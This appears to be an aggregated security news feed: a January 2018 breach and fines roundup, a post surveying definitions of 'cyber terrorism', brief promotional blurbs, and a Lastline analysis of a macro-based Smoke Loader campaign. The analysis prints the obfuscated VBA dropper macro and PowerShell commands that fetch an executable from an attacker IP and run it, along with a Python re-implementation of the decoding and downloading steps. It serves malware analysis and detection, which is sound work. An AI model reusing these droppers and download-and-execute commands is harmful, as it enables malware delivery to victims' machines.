2018 started with a bang after Google security researchers disclosed serious security vulnerabilities in just about every computer processor in use on the planet. Named 'Meltdown' and 'Spectre', these vulnerabilities, when exploited by a hacker or malware, disclose confidential data. As a result, a whole raft of critical security updates was hastily released for computer and smartphone operating systems, web browsers, and processor drivers. While processor manufacturers have been rather lethargic in reacting and producing patches for the problem, software vendors such as Microsoft, Google and Apple reacted quickly, releasing security updates to protect their customers from the vulnerable processors; kudos to them.

The UK Information Commissioner's Office (ICO) heavily criticised Carphone Warehouse for security inadequacies and fined the company £400K following its 2015 data breach, in which the personal data, including bank details, of millions of Carphone Warehouse customers was stolen by hackers, in what the company at the time described as a "sophisticated cyber attack". Where have we heard that excuse before? Certainly the ICO wasn't buying it after investigating, reporting a long list of Carphone Warehouse security failures: the use of software that was six years out of date; a lack of "rigorous controls" over who had login details to systems; no antivirus protection running on the servers holding data; the same root password used on every individual server, which was known to "some 30-40 members of staff"; and the needless storage of full credit card details. Carphone Warehouse should thank its lucky stars the breach didn't occur after the General Data Protection Regulation comes into force in May; with such a damning list of security failures, the company may well have been fined considerably more by the ICO, which gains vastly greater financial sanctions and powers under the GDPR.

The National Cyber Security Centre warned that the UK national infrastructure faces serious nation-state attacks, stating it is a matter of "when", not "if". There are also claims that the cyberattacks against Ukraine in recent years were down to Russia testing and tuning its nation-state cyberattack capabilities.

At the Davos summit, the Maersk chairman revealed his company spent a massive £200m to £240m on recovering from the recent NotPetya ransomware outbreak, after the malware 'totally destroyed' the Maersk network. That's a huge price to pay for not regularly patching your systems.

It's no surprise that cybercriminals continue to target cryptocurrencies given the high financial rewards on offer. The most notable attack was a £290k cyber-heist from BlackWallet, in which the hackers redirected 700k BlackWallet users to a fake replica BlackWallet website after compromising BlackWallet's DNS server. The replica website ran a script that transferred user cryptocurrency into the hacker's wallet; the hacker then moved the currency onto a different wallet platform.

In the United States, the Federal Trade Commission (FTC) fined toy firm VTech US$650,000 (£482,000) for violating US children's privacy law. The FTC alleged the toy company violated the Children's Online Privacy Protection Rule (COPPA) by collecting personal information from hundreds of thousands of children without providing direct notice.

It was reported that a POS malware infection at Forever21, together with lapses in encryption, was responsible for the theft of debit and credit card details from Forever21 stores late last year. Payment card data continues to be a high-value target for cyber crooks with sophisticated attack capabilities, who are willing to invest considerable resources to achieve their aims.

Several interesting cybersecurity reports were released in January. The Online Trust Alliance Cyber Incident & Breach Trends Report: 2017 concluded that cyber incidents doubled in 2017 and that 93% were preventable. Carbon Black's 2017 Threat Report stated that non-malware-based cyber-attacks were behind the majority of cyber-incidents reported in 2017, despite the proliferation of malware available to both professional and amateur hackers. Carbon Black also reported that ransomware attacks are inflicting significantly higher costs and that the number of attacks skyrocketed during the course of the year; no surprise there.

Malwarebytes 2017 State of Malware Report said ransomware attacks on consumers and businesses slowed down towards the end of 2017 and were being replaced by spyware campaigns, which rose by over 800% year-on-year. Spyware campaigns not only allow hackers to steal precious enterprise and user data but also allows them to identify ideal attack points to launch powerful malware attacks. The Cisco 2018 Privacy Maturity Benchmark Study claimed 74% of privacy-immature organisations were hit by losses of more than £350,000, and companies that are privacy-mature have fewer data breaches and smaller losses from cyber-attacks.




Declaring War on Cyber Terrorism…or Something Like That

This post is co-authored by Deana Shick, Eric Hatleback and Leigh Metcalf

Buzzwords are a mainstay in our field, and "cyberterrorism" currently is one of the hottest. We understand that terrorism is an idea, a tactic for actor groups to execute their own operations. Terrorists are known to operate in the physical world, mostly by spreading fear with traditional and non-traditional weaponry. As information security analysts, we also see products where "terrorists" are ranked in terms of sophistication, just like any other cyber threat actor group. But how does the definition of "terrorism" change when adding the complexities of the Internet? What does the term "cyber terrorism" actually mean?

We identified thirty-seven (37) unique definitions of "cyber terrorism" drawn from academic and international-relations journals, the web, and conference presentations. These definitions date back as far as 1998, with the most recent being published in 2016. We excluded any circular definitions based on the findings in our set. We broke down these definitions into their main components in order to analyze and compare definitions appropriately. The definitions, as a whole, broke into the following thirteen (13) categories, although no single definition included all of them at once:

  • Against Computers: Computers are a necessary target of the action.
  • Criminals: Actions performed are criminal acts, according to the relevant applicable law.
  • Fear: The action is intended to incite fear in the victims.
  • Hacking: The attempt to gain unauthorized access into a targeted network.
  • Religion: Religious tenets are a motivator to perform actions.
  • Socially Motivated: Social causes or constructs motivate the action.
  • Non-State Actors: Individuals or groups not formally allied to a recognized country or countries.
  • Politics: The political atmosphere and other occurrences within a country or countries motivate action.
  • Public Infrastructure: Government-owned infrastructure is a target of the action.
  • Against the public: Actions performed against a group of people, many of whom are bystanders.
  • Terrorism: Violence perpetrated by individuals to intimidate others into action.
  • Using Computers: Computers are used during actions on objectives.
  • Violence: The use of force to hurt or damage a target.

After binning each part of the definitions into these categories, we found that there is no consensus definition of "cyber terrorism." Our analysis of each definition is shown in Figure 1. One factor that might explain the diversity of opinions is the lack of a single, agreed-upon definition of "terrorism" on the international stage, even before adding the "cyber" adjective. So, what does this mean for us?
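To make the comparison concrete, here is a minimal sketch of the binning approach, in Python with invented toy definitions rather than our actual data set: each definition becomes the set of categories it mentions, and a consensus definition would be any category shared by every set.

```python
# Toy stand-ins for three surveyed definitions, each represented
# by the set of categories it was binned into (hypothetical values).
definitions = {
    "def_A": {"Fear", "Violence", "Using Computers"},
    "def_B": {"Politics", "Non-State Actors", "Against Computers"},
    "def_C": {"Fear", "Politics", "Hacking"},
}

def consensus(defs):
    # Categories present in every definition; an empty set means no consensus.
    return set.intersection(*defs.values())

print(consensus(definitions))  # set() -- no category is common to all three
```

Applied to the real thirty-seven definitions, the intersection is likewise empty, which is exactly the "no consensus" finding above.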

In the information security field, vendors, analysts, and researchers tend to slap the term "cyber" onto any actions involving an internet connection. While this may be appropriate in some cases, terrorism does not seem to translate well into bytes and packets. Perhaps this is due to the physical, visceral nature that terrorists require to be successful, or perhaps it is due to the lack of a true use-case of a terrorist group successfully detonating a computer. We should remain mindful as a community not to perpetuate fear, uncertainty, or doubt by using terms and varying adjectives without a common understanding.


Figure 1: Definitions found based on common bins


CUTV News Radio spotlights Michael Peters of Lazarus Alliance


CUTV News Radio, with veteran award-winning broadcast TV and radio hosts and media personalities Jim Masters and Doug Llewelyn, is an exciting, informative, entertaining, thought-provoking and empowering broadcast series featuring several LIVE episodes daily. It is a service of the Telly Award-winning CUTV News, a full-service media company that provides entrepreneurs, business owners and extraordinary people a platform to share their story worldwide.


How to eliminate the default route for greater security

If portions of enterprise data-center networks have no need to communicate directly with the internet, then why do we configure routers so every system on the network winds up with internet access by default?

Part of the reason is that many enterprises use an internet perimeter firewall performing port address translation (PAT) with a default policy that allows access to the internet, a solution that leaves open a possible path by which attackers can breach security.



Growing North Korean cyber capability

Recent missile launches from the DPRK have received a lot of attention; however, their cyber offensives have also been active and are growing in sophistication. North Korean cyber attack efforts involve around 6,000 military operatives within the structure of the Reconnaissance General Bureau (RGB), part of the military of which Kim Jong-un is supreme …

Tactical Sweaters – Enterprise Security Weekly #78

This week, Paul and John interview Brendan O'Connor, Security CTO at ServiceNow, and John Moran, Senior Project Manager of DFLabs! In the news, we have updates from Twistlock, Microsoft, BeyondTrust, and more on this episode of Enterprise Security Weekly!



Smoke Loader Campaign: When Defense Becomes a Numbers Game

Authored by Alexander Sevtsov
Edited by Stefano Ortolani


Everybody knows that PowerShell is a powerful tool to automate different tasks in Windows. Unfortunately, many bad actors know that it is also a sneaky way for malware to download its payload. A few days ago we stumbled upon an interesting macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16) that is making one too many assumptions about the underlying operating system, thus sometimes failing to execute.

The Malicious Document

The malicious document file consists of the following macro code:

Private Sub Document_Open()
    Dim abasekjsh() As Byte, bfjeslksl As String, izhkaheje As Long
    ' Read the "Title" built-in document property (the property name is
    ' assembled from Chr() codes) as an ANSI byte array
    abasekjsh = StrConv(ThisDocument.BuiltInDocumentProperties(Chr(84) + Chr(105) + _
        Chr(116) + Chr(108) + Chr(101)), vbFromUnicode)
    ' Subtract 6 from every byte to decode the hidden string
    For izhkaheje = 0 To UBound(abasekjsh)
        abasekjsh(izhkaheje) = abasekjsh(izhkaheje) - 6
    Next izhkaheje
    bfjeslksl = StrReverse(StrConv(abasekjsh, vbUnicode))
    ' Substitute the placeholder tokens, then launch the decoded command line
    Shell (Replace(Replace(Split(bfjeslksl, "|")(1), Split(bfjeslksl, "|")(0), Chr(46)), _
        "FPATH", ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0
End Sub

The macro itself is nothing special: it first reads the “Title” property by accessing the BuiltInDocumentProperties of the current document. The property value is then used to decode a PowerShell command line, which is eventually executed via the Shell method.
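Under the hood, the transformation is trivial. As a rough illustration (in Python rather than VBA, and with a made-up command string, not the real one), decoding amounts to shifting every byte down by 6 and then reversing the result:

```python
def decode_title(title: str) -> str:
    # Mirror the macro: subtract 6 from each byte of the Title property
    # (the VBA loop), then reverse the string (StrReverse).
    shifted = bytes((b - 6) % 256 for b in title.encode("latin-1"))
    return shifted.decode("latin-1")[::-1]

# A hypothetical command, encoded the way a dropper author would prepare it:
command = "powershell -w 1 Start-Process calc"
encoded = "".join(chr(ord(c) + 6) for c in reversed(command))
assert decode_title(encoded) == command
```

The real document goes one step further: it splits the decoded string on "|" and substitutes placeholder tokens (a dot marker and the FPATH document path) before passing the command line to Shell.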

The PowerShell Downloader

Instead of using sophisticated evasion techniques, the malware relies on a feature available from PowerShell 3.0 onwards. To download the malicious code the command invokes the Invoke-WebRequest cmdlet:

powershell.exe -w 1 Invoke-WebRequest -Uri http://80.82.67[.]217/poop.jpg -OutFile ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');
powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');

This tiny detail has the side-effect of requiring Windows 8 and above for the command to complete successfully. Note that although PowerShell comes installed by default since Windows 7, PowerShell 3.0 is only available on Windows 7 as an optional update. Therefore any network activity can only be observed if the underlying operating system is at least Windows 8, or if Windows 7 has the specific update installed. In other words, the more diversity between our analysis environments, the more chances we can elicit the malicious behavior.

Payload – Smoke Loader

The payload is a variant of the Smoke Loader family (Figure 1) which shows quite a number of different activities when analyzed by the Lastline sandbox (sha1: f227820689bdc628de34cc9c21000f3d458a26bf):

Figure 1. Analysis overview of the Smoke Loader

As often happens, the signatures are not really informative, as we can see in Figure 2.

Figure 2. VT detection of the Smoke Loader

The aim of this malware is to download other components by sending 5 different POST requests to microsoftoutlook[.]bit/email/send.php. While some are met with a 404 error, three are successful and download the following payloads:

  • GlobeImposter Ransomware eventually displaying the ransom note in Figure 3.

    Figure 3. Ransom note of the GlobeImposter Ransomware delivered by the Smoke Loader.

  • Zeus trojan banker, also known as Zbot, capturing online banking sessions and stealing credentials from known FTP clients, such as FlashFXP, CuteFtp, WsFTP, FileZilla, BulletProof FTP, etc.
  • Monero CPU miner based on the open source XMRig project (as indicated by some of the strings included in the binary, see Figure 4). The command used to spawn the miner reveals a well-known pool ID we have already been seeing:

wuauclt.exe -o stratum+tcp:// -u 4FbnHbJZ2tAqPas12PV5F6te.smoke30+10000 -p x --safe

Figure 4. XMRig Monero CPU miner


It’s worth mentioning that this is not the first time we have seen the IP address from which the loader is downloaded. Based on our intelligence records, another malicious VBA-based document file (sha1: 03a06782e60e7e7b724a0cafa19ee6c64ba2366b) called a similar PowerShell script that executed perfectly on a default Windows 7 installation:

powershell $webclient = new-object System.Net.WebClient;
$myurls = 'http://80.82.67[.]217/moo.jpg'.Split(',');
$path = $env:temp + '\~tmp.exe';
foreach($myurl in $myurls) {
    try {
        $webclient.DownloadFile($myurl.ToString(), $path);
        Start-Process $path;
    } catch {}
}
This variant downloads the payload by invoking the DownloadFile method from the System.Net.WebClient class, indeed a much more common (and backward compatible) approach to retrieve a remote resource.
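The loop's logic is easy to model. The sketch below re-implements it in Python purely for illustration, with a caller-supplied fetch function standing in for WebClient.DownloadFile and the Start-Process step deliberately omitted:

```python
import os
import tempfile

def first_successful_download(urls, fetch):
    """Mirror the script's foreach loop: try each URL in turn, write the
    payload to <temp>/~tmp.exe, and stop at the first success.
    (The original script would Start-Process the file at that point.)"""
    path = os.path.join(tempfile.gettempdir(), "~tmp.exe")
    for url in urls:
        try:
            data = fetch(url)          # stand-in for WebClient.DownloadFile
            with open(path, "wb") as f:
                f.write(data)
            return path
        except Exception:
            continue                   # silent failure, like the empty catch {}
    return None
```

Note the empty catch block: a dead or blocked URL produces no observable error at all, which is one reason failed download attempts from droppers like this often leave so little trace in a sandbox run.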


There is an inherent problem with dynamic analysis: which version of the underlying operating system should be used? To address this issue, the Lastline engine is capable of running deep behavioral analysis on several different operating systems, increasing the probability of a successful execution. Moreover, application bundles (see previous article for more details) can be further used to shape the analysis environment when additional requirements are needed to elicit the malicious behavior.

Figure 5 shows what the analysis overview looks like when analyzing the sample discussed in this article: besides some reported structural anomalies, which are detected by our static document analysis, we can see that dynamic behaviors are exhibited only in Windows 10.

Figure 5. Analysis overview of the malicious macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16)


In this article, we analyzed a malicious macro-based document that relies on a specific version of PowerShell to deliver Smoke Loader, a highly sophisticated multi-component malware. It does so by calling a cmdlet normally not available in the PowerShell version installed by default on Windows 7, showing once more that operating system diversity is a key requirement for successful dynamic analysis.

Appendix: IoCs

The Malicious Document b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16
Smoke Loader f227820689bdc628de34cc9c21000f3d458a26bf
Monero CPU Miner 88eba5d205d85c39ced484a3aa7241302fd815e3
Zeus Trojan 54949587044a4e3732087a56bc1d36096b9f0075
GlobeImposter Ransomware f3cd914ba35a79317622d9ac47b9e4bfbc3b3b26
Smoke Loader C&C microsoftoutlook[.]bit

The post Smoke Loader Campaign: When Defense Becomes a Numbers Game appeared first on Lastline.